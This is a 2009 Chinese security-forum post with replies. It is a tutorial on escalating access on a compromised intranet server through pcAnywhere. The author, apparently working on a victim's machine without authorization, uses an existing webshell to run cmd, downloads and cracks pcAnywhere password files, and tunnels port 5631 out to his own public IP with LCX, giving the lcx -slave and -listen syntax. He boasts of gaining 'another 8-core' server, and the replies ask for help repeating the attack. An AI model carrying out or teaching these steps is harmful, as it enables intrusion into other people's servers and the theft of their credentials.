标题:
[原创文章]
pcanywhere之内网提权
[打印本页]
作者:
huar
时间:
2009-7-5 21:35
标题:
pcanywhere之内网提权
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
- w' G& h7 d6 I8 I! j; E& P
. A! q7 _% d& Z/ {4 |
提权方法:pcanywhere+LCX
4 t/ K2 b. c2 {% E" H
& a# ?/ e1 @; C2 s% X4 _
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
8 y9 `/ k/ s: y: K* M
* c6 E, Z* m1 H( A
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
7 G, w4 O. `, \) G
% k+ B- ^4 C! X; g
[attach]1548[/attach]
P9 ]9 o. \+ `) r( r1 N3 X# ]
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
: g z0 L! k9 a. j- C9 A: O) G) l$ c
$ Z- c4 d! B) A
[attach]1549[/attach]
2 z0 J6 L2 T( L+ D: Z
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
7 n. k( n. _/ F7 P3 |# E5 D
! i1 d& h6 ~& ]% \$ J
[attach]1550[/attach]
* w, _$ Q* v1 J* b5 k' m; B
: ~" S( @8 z+ |8 b" H) @( d, @
[attach]1551[/attach]
6 }9 p( a) Z( Q0 Z) c
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
6 J4 D/ I- t( a' K' Q
1 ]6 ~8 ^; [4 W/ W
[attach]1552[/attach]
9 y3 l- e$ G! C" L! D/ g7 a
LCX的用法再简单说下:
) I, E* K d8 I1 s
5 p" |- `1 z% N1 y
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
: G/ s' J: ]1 l6 M" W
& z0 m8 ]. w: W, a
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
4 X% P. J2 k t# F1 o
; ] Q9 g+ n T! d8 s5 @) n
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
3 O8 W2 W0 H$ S& ]
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
& J, Y4 C- p" s5 \
( ?5 U4 X6 K/ Q% d: d2 A+ J5 b
[attach]1553[/attach]
# x7 W2 C- p" A; ~
* V- J6 ]4 f+ }3 a
[attach]1554[/attach]
. P5 g5 ~9 }( \* q2 ^9 ^: K
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
( L, K, {; j# Q g) a. y
1 c7 {, L( b6 e
[attach]1555[/attach]
1 `% ?; h+ E |0 p+ ^% k. S3 {
2 w9 s, t m7 `/ ~
[attach]1556[/attach]
% l, N9 t( f Q; y2 d- ]# y0 V. d
我们本地连接试试,输入我们刚破解的账号密码
/ O3 R9 L% G' @. w; h6 V }. L
9 U& b$ b% I: Y# Z
[attach]1557[/attach]
- s8 y+ k9 Z9 V3 y
呵呵``连接成功,服务器不错,又一个8核^︵^
8 v! q( K8 G6 N2 E, M; P
- W g2 U1 O7 H, l" m$ u
[attach]1558[/attach]
8 F4 ]% A3 G4 B: a' M) a
% X9 F0 k5 ~5 T k( o" R
[attach]1559[/attach]
作者:
柔肠寸断
时间:
2009-7-5 21:37
不错不错。。。你的貌似一直都是内网服务器哈
作者:
huar
时间:
2009-7-5 21:41
哎。。。。运气不佳```老碰见内网的。。。。
作者:
gassiori
时间:
2009-7-6 09:50
八核的哟
作者:
柔肠寸断
时间:
2009-12-15 15:36
顶起。。。。。。。。。
作者:
killadmin
时间:
2010-1-21 20:01
但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2